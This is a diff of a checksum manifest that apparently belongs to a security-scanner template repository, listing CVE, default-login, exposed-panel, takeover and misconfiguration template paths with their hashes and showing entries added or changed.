|
||||
http/cves/2023/CVE-2023-27032.yaml:ff5f86063146df89d119061535c3d6cfa9c74474
|
||||
http/cves/2023/CVE-2023-27034.yaml:e2c1ce7882a10ef1b7e9126950304588d00ff267
|
||||
http/cves/2023/CVE-2023-27159.yaml:2687d77e90b419ac3a52ddc4e837eeb6135a6da6
|
||||
http/cves/2023/CVE-2023-27179.yaml:37e8c6b241909fc9025935c171317ee092f9b206
|
||||
|
@ -2990,7 +2993,7 @@ http/cves/2023/CVE-2023-2796.yaml:a25d85c244928e675267d06c4976d84d1a72d3d3
|
|||
http/cves/2023/CVE-2023-28121.yaml:49ee6dc575ca492684912f95dbcc8810f3f29de0
|
||||
http/cves/2023/CVE-2023-2813.yaml:485032b8c58efb4cdeb458a4387374d6faa9c4c5
|
||||
http/cves/2023/CVE-2023-2822.yaml:b638b609770d15a230fa7246f171a5a654bce03e
|
||||
http/cves/2023/CVE-2023-2825.yaml:05c22f1ab260687827e98d9eddab16c82012cc8e
|
||||
http/cves/2023/CVE-2023-2825.yaml:e52fcd86c715c973f0d368fec0a8bbe61a0aa3ac
|
||||
http/cves/2023/CVE-2023-28343.yaml:c781cd98e3899efad10ad98e84ccad6bb0d2435c
|
||||
http/cves/2023/CVE-2023-28432.yaml:257ea32d858fb24d05fd61158b2c57b3ce5766f1
|
||||
http/cves/2023/CVE-2023-28662.yaml:146d269965800ab6ea40ae0c05bb94f1bcacceb1
|
||||
|
@ -3026,6 +3029,7 @@ http/cves/2023/CVE-2023-31059.yaml:2f55ef6a46f15bb784839290fdc7a1a536472c36
|
|||
http/cves/2023/CVE-2023-31446.yaml:0ba3222752c4cc2de6941cdce24a66042f78e1c3
|
||||
http/cves/2023/CVE-2023-31465.yaml:6bd33dcdf6008201a427dc26394290cd8a743bee
|
||||
http/cves/2023/CVE-2023-31548.yaml:2c5cbc65c0eccc342f8a64e1446f235eb72859a9
|
||||
http/cves/2023/CVE-2023-32077.yaml:209f5ecaac978f98f6002f5813e39d9f49226d5c
|
||||
http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b
|
||||
http/cves/2023/CVE-2023-3219.yaml:30c6a139afeb951daf2ed2734dcae25ef3db05ca
|
||||
http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818
|
||||
|
@ -3051,7 +3055,7 @@ http/cves/2023/CVE-2023-34362.yaml:5e6a1ddcdf96d45153174df95d001082d9e22b1c
|
|||
http/cves/2023/CVE-2023-34537.yaml:ce2b42c314ea85f2cf7f4081e19600bcd2c5db7c
|
||||
http/cves/2023/CVE-2023-34598.yaml:90635e327c11d10e4dfc2da81ff445a669d976fb
|
||||
http/cves/2023/CVE-2023-34599.yaml:252d4509a26d36ab69876630693c3bf216802eb3
|
||||
http/cves/2023/CVE-2023-3460.yaml:02b8c5ee36c2524dc11a93652b0652232ec3876f
|
||||
http/cves/2023/CVE-2023-3460.yaml:88688540a54e02217069f7359cdbe3ddfde15289
|
||||
http/cves/2023/CVE-2023-34659.yaml:752f2d986befb41386fb76463ee258482a720d80
|
||||
http/cves/2023/CVE-2023-34751.yaml:725022730026691d6d788f2e23664b9068db36a6
|
||||
http/cves/2023/CVE-2023-34752.yaml:e188543250435b6a6dc5e1082a9cdb02a17bc5f5
|
||||
|
@ -3102,6 +3106,7 @@ http/cves/2023/CVE-2023-3848.yaml:626c7451b8a7417718cdc68024755692bb45b6af
|
|||
http/cves/2023/CVE-2023-3849.yaml:fc829971129fd5dd0e9f5efefcc0f9a8ce81db52
|
||||
http/cves/2023/CVE-2023-38501.yaml:105e3431e6c0c3cc63a89c92edd808e0e21ea0d8
|
||||
http/cves/2023/CVE-2023-38646.yaml:64213f51ae213555592207527e163a41e82c66ab
|
||||
http/cves/2023/CVE-2023-38964.yaml:03b48ad92119668fb6e83bb4d65f686be71735de
|
||||
http/cves/2023/CVE-2023-39002.yaml:6b28884d827963d2b420ca0054935711ae4e7ac7
|
||||
http/cves/2023/CVE-2023-39026.yaml:a51a79a6eb674c4075565e9dbbc5e77ecce8b8d3
|
||||
http/cves/2023/CVE-2023-39108.yaml:692192b618ece9c517379af9e65f86f9b29bf882
|
||||
|
@ -3146,6 +3151,7 @@ http/cves/2023/CVE-2023-42442.yaml:f9d27d085afe82b96452ceaccf7be30e9a2202f9
|
|||
http/cves/2023/CVE-2023-42793.yaml:a842d71c8b60488cd3dc70eb328d5b70050216bf
|
||||
http/cves/2023/CVE-2023-43177.yaml:5952017087ab37bcfce0de1edfc977ccdca951f4
|
||||
http/cves/2023/CVE-2023-43187.yaml:9114ac2207f9c442f7a20843775a6f3d8d47a64f
|
||||
http/cves/2023/CVE-2023-43208.yaml:fe7941493bcf8b59fd55d2e57288bbb985cf2d65
|
||||
http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56
|
||||
http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6
|
||||
http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d
|
||||
|
@ -3154,6 +3160,9 @@ http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb
|
|||
http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e
|
||||
http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3
|
||||
http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542
|
||||
http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166
|
||||
http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b
|
||||
http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e
|
||||
http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5
|
||||
http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2
|
||||
http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf
|
||||
|
@ -3161,6 +3170,7 @@ http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e
|
|||
http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686
|
||||
http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb
|
||||
http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1
|
||||
http/cves/2023/CVE-2023-46347.yaml:78b9ee5474f96b6390c07647e986fe9bc0ab2e96
|
||||
http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92
|
||||
http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191
|
||||
http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c
|
||||
|
@ -3179,6 +3189,7 @@ http/cves/2023/CVE-2023-4966.yaml:14102dfbda787ccbbd24875179e48acbdae04643
|
|||
http/cves/2023/CVE-2023-4973.yaml:fd42b4708183812b84a950edadb28cd74acf7664
|
||||
http/cves/2023/CVE-2023-4974.yaml:d7a5386c5971e13babc28e9f346991ef0e82fba2
|
||||
http/cves/2023/CVE-2023-49785.yaml:37c94b4ef0f6b07d703d372d1e5a0841e9a3184e
|
||||
http/cves/2023/CVE-2023-5003.yaml:f7da2dff91d97d8c63abb7faf35019a0bb73906a
|
||||
http/cves/2023/CVE-2023-50290.yaml:993704655d9bb469f8ea073c9757676b3ee1468f
|
||||
http/cves/2023/CVE-2023-5074.yaml:7b27fc2c3a6ecd3375ca4faf384c14cc480f859c
|
||||
http/cves/2023/CVE-2023-5089.yaml:143e9400b53b44e4fca7cdd97d47add25ac940b6
|
||||
|
@ -3202,6 +3213,7 @@ http/cves/2023/CVE-2023-6114.yaml:fb42b31775be2bbad24ddc15474b08d1d5a14341
|
|||
http/cves/2023/CVE-2023-6360.yaml:02f33c56e0b2c876afb8067605ecea59372947b6
|
||||
http/cves/2023/CVE-2023-6379.yaml:6ebc677324ecc29a9012474f6228f27be950dee0
|
||||
http/cves/2023/CVE-2023-6380.yaml:24e6506046fab035c83ce942b572d9389c88df15
|
||||
http/cves/2023/CVE-2023-6389.yaml:a7849d4aba637c66da0d3d08b08158b6ccfcd27d
|
||||
http/cves/2023/CVE-2023-6553.yaml:7976983a9d94d1562386621c7528c4e1af07ee89
|
||||
http/cves/2023/CVE-2023-6567.yaml:83818566ad0764aa9933b7f1905075c40b645479
|
||||
http/cves/2023/CVE-2023-6623.yaml:182c33805efba63a9f987417b6e13ce81c8643e9
|
||||
|
@ -3211,12 +3223,15 @@ http/cves/2023/CVE-2023-6875.yaml:2e8817b2133461b7fdb1b0d59f4c197202c3bd60
|
|||
http/cves/2023/CVE-2023-6895.yaml:9f63f7d60c0a07f24f11688a0021a925aafa4c26
|
||||
http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f
|
||||
http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158
|
||||
http/cves/2023/CVE-2023-6989.yaml:d00f0a2249e0bde6f0803f5bb7884544e5cadfd4
|
||||
http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac
|
||||
http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49
|
||||
http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe
|
||||
http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8
|
||||
http/cves/2024/CVE-2024-0337.yaml:a0259282bfc67ee1b2339ea3af3bd295baa59cc3
|
||||
http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8
|
||||
http/cves/2024/CVE-2024-0713.yaml:391fe60dbb13edaff0fb693b1b25fb71dcfb0241
|
||||
http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437
|
||||
http/cves/2024/CVE-2024-1021.yaml:a48c4dce997dffd7ee3b988bc0dc646f2cf840d7
|
||||
http/cves/2024/CVE-2024-1061.yaml:86d3c132707db27f265ffc55e9a5897dd6b03fd0
|
||||
http/cves/2024/CVE-2024-1071.yaml:f9280444cf13a8677b365b28c1bf7cd991829d9c
|
||||
|
@ -3232,11 +3247,15 @@ http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996
|
|||
http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864
|
||||
http/cves/2024/CVE-2024-21887.yaml:9e4e007bba9354b143ea5c286d57142e4a967673
|
||||
http/cves/2024/CVE-2024-21893.yaml:fbd24aa08d6ee9e7b7c2a235810f1b6ee65aad1a
|
||||
http/cves/2024/CVE-2024-22024.yaml:8f8fbb852668db0a337fbc6e9046e4a05c458be1
|
||||
http/cves/2024/CVE-2024-22024.yaml:36f71684ca8bef143db91384fa7437000786c8b0
|
||||
http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d
|
||||
http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb
|
||||
http/cves/2024/CVE-2024-22927.yaml:55eada76a32a5cb2d7c30cebb426f9efb40a0c7c
|
||||
http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe
|
||||
http/cves/2024/CVE-2024-2340.yaml:bf15cb04b444f7c09b0602e12e9bb3c77cd7ecf7
|
||||
http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07
|
||||
http/cves/2024/CVE-2024-23917.yaml:91acf4a916db564da116aad3221f1a662477c3ed
|
||||
http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba
|
||||
http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05
|
||||
http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81
|
||||
http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c
|
||||
|
@ -3246,15 +3265,27 @@ http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d
|
|||
http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88
|
||||
http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b
|
||||
http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43
|
||||
http/cves/2024/CVE-2024-27956.yaml:6642a8487441523926a0828c54b333ba9737522f
|
||||
http/cves/2024/CVE-2024-28255.yaml:dd2f4a52d0d4f9af3c6a6fc10a917e99e8f0717d
|
||||
http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096
|
||||
http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b
|
||||
http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841
|
||||
http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a
|
||||
http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc
|
||||
http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d
|
||||
http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730
|
||||
http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea
|
||||
http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba
|
||||
http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf
|
||||
http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6
|
||||
http/cves/2024/CVE-2024-3273.yaml:ba09cef76e7e1002ae6d72d3d9b670f09562ca9b
|
||||
http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921
|
||||
http/cves/2024/CVE-2024-32651.yaml:923d99a00afdb05df7e401f31ce5950112b31890
|
||||
http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17
|
||||
http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b
|
||||
http/cves/2024/CVE-2024-33724.yaml:cb12817b487797686ea48ef42ff6735b28d3c2a6
|
||||
http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c
|
||||
http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82
|
||||
http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b
|
||||
http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671
|
||||
http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce
|
||||
http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda
|
||||
|
@ -3409,6 +3440,7 @@ http/default-logins/showdoc/showdoc-default-login.yaml:a3fadb617e0f5eab493196fc3
|
|||
http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdacbcd946cd0cfc8a2
|
||||
http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd
|
||||
http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5
|
||||
http/default-logins/soplanning/soplanning-default-login.yaml:3c498e1990912358f380b450f3d4f18fdfa0ebb1
|
||||
http/default-logins/spectracom/spectracom-default-login.yaml:7c514a27f7ce59eef6cc11b96b71847744a1b2e7
|
||||
http/default-logins/splunk/splunk-default-login.yaml:c004b6e534b8b20e57ee70d52d098be812b99a40
|
||||
http/default-logins/stackstorm/stackstorm-default-login.yaml:0274c411f83fd1b0a84f76713be8f34aec66468c
|
||||
|
@ -3669,6 +3701,7 @@ http/exposed-panels/cudatel-panel.yaml:c079445a851e40233a8c56dfda788e5c9b32547b
|
|||
http/exposed-panels/cvent-panel-detect.yaml:a87e443274a8ae60dfeb181ff9e3ab288246d852
|
||||
http/exposed-panels/cwp-webpanel.yaml:9ccee2ed3e4baface4e30a0567b2e46c2976851e
|
||||
http/exposed-panels/cx-cloud-login.yaml:eacbb09b6c7b16b4234ac371e71b2130c738cb5e
|
||||
http/exposed-panels/cyberchef-panel.yaml:53cd896d234ec5f37fa902dfd42e5b07227b7536
|
||||
http/exposed-panels/cyberoam-ssl-vpn-panel.yaml:93abfca996a479f9098e274c3fa5519f6e64f3f9
|
||||
http/exposed-panels/d-link-wireless.yaml:dbcf6912b865faa71a59141e83d00456ce6ceef0
|
||||
http/exposed-panels/dahua-web-panel.yaml:c7b88f6dd9cec15974fab83f071cf7ad63d37ee0
|
||||
|
@ -4026,7 +4059,7 @@ http/exposed-panels/movable-type-login.yaml:508709af62f02d5ef93ae76aec1011e33ed9
|
|||
http/exposed-panels/mpftvc-admin-panel.yaml:27d2315c408e5c841b919dd79179b3f258fff0ed
|
||||
http/exposed-panels/mpsec-isg1000-panel.yaml:502b156e58d8ec3d292c50a100686eca248af616
|
||||
http/exposed-panels/ms-adcs-detect.yaml:1ab74132704c2624f19daf5aa4e91de02d43b631
|
||||
http/exposed-panels/ms-exchange-web-service.yaml:255c6cd08b7e42ddc3f05860351b8917ba3c08ba
|
||||
http/exposed-panels/ms-exchange-web-service.yaml:63763b42dba4a1a1a733772a1432013fc9364438
|
||||
http/exposed-panels/mspcontrol-login.yaml:d381675b12cdce4fe5f104c4e3b114387242a74c
|
||||
http/exposed-panels/mybb/mybb-forum-install.yaml:764347d8fe87bdd580b7f5fec9dcc60b90c0aa25
|
||||
http/exposed-panels/mybb-forum-detect.yaml:4952dbcff061cad8b74587f35167a1f4f1229031
|
||||
|
@ -4111,6 +4144,7 @@ http/exposed-panels/openvpn-connect.yaml:92b51be8820e8d19dcab982f32e889e0ac84fc0
|
|||
http/exposed-panels/openvpn-monitor.yaml:8bdcaa711f6852aeae49b0dde458dd17ed94f146
|
||||
http/exposed-panels/openvpn-router-management.yaml:4c372e21e9ecc176fd0e9edd4fa3195012d17bbf
|
||||
http/exposed-panels/openvz-web-login.yaml:37b140070fa9fc0fc6ff0b5d95fbb7b6dd660aa6
|
||||
http/exposed-panels/openwebui-panel.yaml:796f6949f34bdd706906d64b112519415f6cf396
|
||||
http/exposed-panels/openwrt/openwrt-luci-panel.yaml:23c9398019d54040ec5ec64239b8ef54ad683c06
|
||||
http/exposed-panels/openwrt-login.yaml:99bc6770cd1dd9318d0575323ac32f92e4d8ff88
|
||||
http/exposed-panels/openx-panel.yaml:1d6be9b221101c2f1fc724e0273450075e0c46e6
|
||||
|
@ -4209,7 +4243,7 @@ http/exposed-panels/rancher-dashboard.yaml:f5b76b896b81d6515e59109cb0feb9e8bcc41
|
|||
http/exposed-panels/rancher-panel.yaml:9f8e5792e4c50bd25d78d974f3c72a7b4c2cc810
|
||||
http/exposed-panels/raspberrymatic-panel.yaml:c5092f2f1d95cf09589e5326cc291b0631391693
|
||||
http/exposed-panels/rcdevs-webadm-panel.yaml:b154e2a68d185946223ae098853f1139d36d9c22
|
||||
http/exposed-panels/rdweb-panel.yaml:ea3373249cad29938b76c9a9e0d15550a918f495
|
||||
http/exposed-panels/rdweb-panel.yaml:ae93f0fd0ec1a86e1272ef68d2e687641a70e945
|
||||
http/exposed-panels/red-lion-panel.yaml:3069a7ec2e960c21c7ebef0e163dfe412ab1688b
|
||||
http/exposed-panels/redash-panel.yaml:b38d3605aea7c194af88114d3333bba9ba3b4f3d
|
||||
http/exposed-panels/redhat/redhat-satellite-panel.yaml:d22be30acc97a640bb0d4469faeec5b57e6602c9
|
||||
|
@ -4366,6 +4400,7 @@ http/exposed-panels/tableau-service-manager.yaml:e4dc0c6474aa8a500910b956e054007
|
|||
http/exposed-panels/tailon-panel.yaml:932dd429c4c6c0c653283e1ec18f21c33d1f658a
|
||||
http/exposed-panels/tautulli-panel.yaml:b1e7c47f7d30fd55e28e49a0e08a4f1f2ee075df
|
||||
http/exposed-panels/teamcity-login-panel.yaml:e4a0853683e0c6d7f25e8b4efa8ac9986c3efe68
|
||||
http/exposed-panels/teamforge-panel.yaml:8392c4b73a322e6c548d04f0a329f5920d81fe6a
|
||||
http/exposed-panels/teampass-panel.yaml:b20c18ab358e4afa1b363e71e60469127a91b284
|
||||
http/exposed-panels/tectuus-scada-monitor.yaml:2eb28ad9aac490c62d5a0be1004874ce40bce294
|
||||
http/exposed-panels/tekton-dashboard.yaml:5af9080f654df96d79406a398e81f2a7a8117224
|
||||
|
@ -4539,7 +4574,7 @@ http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df
|
|||
http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907
|
||||
http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984
|
||||
http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391
|
||||
http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b
|
||||
http/exposures/backups/settings-php-files.yaml:c3ed4d0da82aebfc6767c6914a17674c995b4f11
|
||||
http/exposures/backups/sql-dump.yaml:ead33d26fe70e2cd7a693b7106740ac4437a4fce
|
||||
http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e
|
||||
http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240
|
||||
|
@ -5092,6 +5127,7 @@ http/miscellaneous/apple-app-site-association.yaml:0c900bfd50a6f29041445996ed33a
|
|||
http/miscellaneous/aws-ecs-container-agent-tasks.yaml:8d29db7a82337344e379b72bce008157bd4df961
|
||||
http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d9e5c7e55
|
||||
http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0
|
||||
http/miscellaneous/cloudflare-rocketloader-htmli.yaml:b590d6e588eeb9411fbfc27c87fcf6b695ee63f5
|
||||
http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387
|
||||
http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5
|
||||
http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e
|
||||
|
@ -5210,7 +5246,6 @@ http/misconfiguration/clickhouse-unauth-api.yaml:50981e20ce91e8483c828bc8dc08342
|
|||
http/misconfiguration/clockwork-dashboard-exposure.yaml:560363ab2aa0f4ee66a559fcd79af2a25a1ec3f3
|
||||
http/misconfiguration/cloud-metadata.yaml:c830abb35eeddf51f760f450947c00499fcdae28
|
||||
http/misconfiguration/cloudflare-image-ssrf.yaml:571629f99a2171f68d0e62923df20f125663bb22
|
||||
http/misconfiguration/cloudflare-rocketloader-htmli.yaml:5d025c481a102118f4ab9e7a2d834520c6714f82
|
||||
http/misconfiguration/cluster-panel.yaml:a55bbcd24bdcbf255c289f5e865ef63a0b00f6ec
|
||||
http/misconfiguration/cobbler-exposed-directory.yaml:024dc111a55d35d7da4e00e12c15ebb9e28c8303
|
||||
http/misconfiguration/codeigniter-errorpage.yaml:85190ddc7995b4e5a3889743d784c9ff750fa987
|
||||
|
@ -5338,6 +5373,7 @@ http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf81728
|
|||
http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251
|
||||
http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99
|
||||
http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a
|
||||
http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b
|
||||
http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea
|
||||
http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a
|
||||
http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e
|
||||
|
@ -6440,7 +6476,7 @@ http/takeovers/aha-takeover.yaml:58e3e7a7486be85c7687c793b5663b84759788a8
|
|||
http/takeovers/airee-takeover.yaml:bd00657159494039fc36913d03ddbf767fa1b93b
|
||||
http/takeovers/anima-takeover.yaml:959b664c800ede2e97646180a495f6295d916231
|
||||
http/takeovers/announcekit-takeover.yaml:92fb87a534f3f920e480a963886f8796836c8383
|
||||
http/takeovers/aws-bucket-takeover.yaml:195e8c743d8ae301556d84355e46d6f4b0f5e193
|
||||
http/takeovers/aws-bucket-takeover.yaml:533b13757c82d22d8235f679fadfda0e036d4591
|
||||
http/takeovers/bigcartel-takeover.yaml:6a8f5abf7259eb5f4a4106653fc665b950b4190a
|
||||
http/takeovers/bitbucket-takeover.yaml:60402aa2ecf993deccac40923f21ce71974dc780
|
||||
http/takeovers/campaignmonitor-takeover.yaml:615bfc25c0b488b95d44a0eda7bb5d7af254cacf
|
||||
|
@ -6486,8 +6522,9 @@ http/takeovers/smartjob-takeover.yaml:bb0363423b3208375c0c1f61ed48187b90057ee8
|
|||
http/takeovers/smugmug-takeover.yaml:6ea3ec73d535db0f8e87ea40aa458ac44a18f7d0
|
||||
http/takeovers/softr-takeover.yaml:a47cd0392585f45846dbbb70a05574cc564e18e6
|
||||
http/takeovers/sprintful-takeover.yaml:b9b552223b69e1b9086b442307c22de6f8bfa864
|
||||
http/takeovers/squadcast-takeover.yaml:779b3c54dab067369ffa422d108a2de9b81a87b2
|
||||
http/takeovers/strikingly-takeover.yaml:9aa7d5d97af3a23c2eddf1035ba17eea747db30f
|
||||
http/takeovers/surge-takeover.yaml:c3c45bfbe18ad235a9a5a999c73172baf77cdb1f
|
||||
http/takeovers/surge-takeover.yaml:0f7c8583cebc4244dd217376b270cdce848441d4
|
||||
http/takeovers/surveygizmo-takeover.yaml:9f2b0bb8599c05d03d37ce48e1b7ae2bdc92c523
|
||||
http/takeovers/surveysparrow-takeover.yaml:1e8b06deab5ec653168e595223f3eb83bb043796
|
||||
http/takeovers/tave-takeover.yaml:36d44f071b52aad95c3496fd4afeb0c50effd4c2
|
||||
|
@ -7487,7 +7524,7 @@ http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml:d2ccf2e6f610a31f1503ed30b074a
|
|||
http/vulnerabilities/jenkins/jenkins-asyncpeople.yaml:28dbb6ff09c477f85b9bb63b572ece60d1f6da94
|
||||
http/vulnerabilities/jenkins/jenkins-script.yaml:d557e9f184eed10b1f1c9d2769ce17b9873bf47f
|
||||
http/vulnerabilities/jenkins/jenkins-stack-trace.yaml:7ebe9434bb86753e39e131e4e69d1f79b279179a
|
||||
http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:8f7dca1421c59002b78381ba8deffb603ab36d04
|
||||
http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:3f864ee1d304a4ea47e603be73b0b193d3764a28
|
||||
http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml:5864d5ddbf7bb775957f9af2c354e278b135e888
|
||||
http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml:ddb4e69fa2143bf694f57a117f26e02f9a0b3db5
|
||||
http/vulnerabilities/jira/jira-servicedesk-signup.yaml:d3ad2f1c3e763757dfc43f44463017a99f5afed4
|
||||
|
@ -7547,7 +7584,6 @@ http/vulnerabilities/oscommerce/oscommerce-rce.yaml:d399ad2fe4a2578818466b237382
|
|||
http/vulnerabilities/other/3cx-management-console.yaml:c5ac1f1f2c02e040cb6b80a626c62d1d986e0191
|
||||
http/vulnerabilities/other/74cms-sqli.yaml:5d44180874e39c81ee0cfccd7fb8c273dbbf48d1
|
||||
http/vulnerabilities/other/WSO2-2019-0598.yaml:241773db7836f950b4f63d9578cdcb8e7a43e632
|
||||
http/vulnerabilities/other/academy-lms-xss.yaml:ecc4c96fefc6cf5ceee4cc407bfaf30d654ec5d6
|
||||
http/vulnerabilities/other/accent-microcomputers-lfi.yaml:7b86368e9c0eaabd5a03518d44928f7d54e592d9
|
||||
http/vulnerabilities/other/acme-xss.yaml:e621ea74a2c2237b2407a82b32cf6979899a4584
|
||||
http/vulnerabilities/other/acti-video-lfi.yaml:132a0b28eb29b6078bf02e465d9caedbb8135562
|
||||
|
@ -7644,7 +7680,7 @@ http/vulnerabilities/other/graylog-log4j.yaml:78b153f3d47c871e1b5ed10e05d4e34445
|
|||
http/vulnerabilities/other/groomify-sqli.yaml:3f757a7ee830559df2f4d03cd5635e1f5c76b099
|
||||
http/vulnerabilities/other/groupoffice-lfi.yaml:f1295e4d7dc7dd52e038ade2373f4576de55dbf8
|
||||
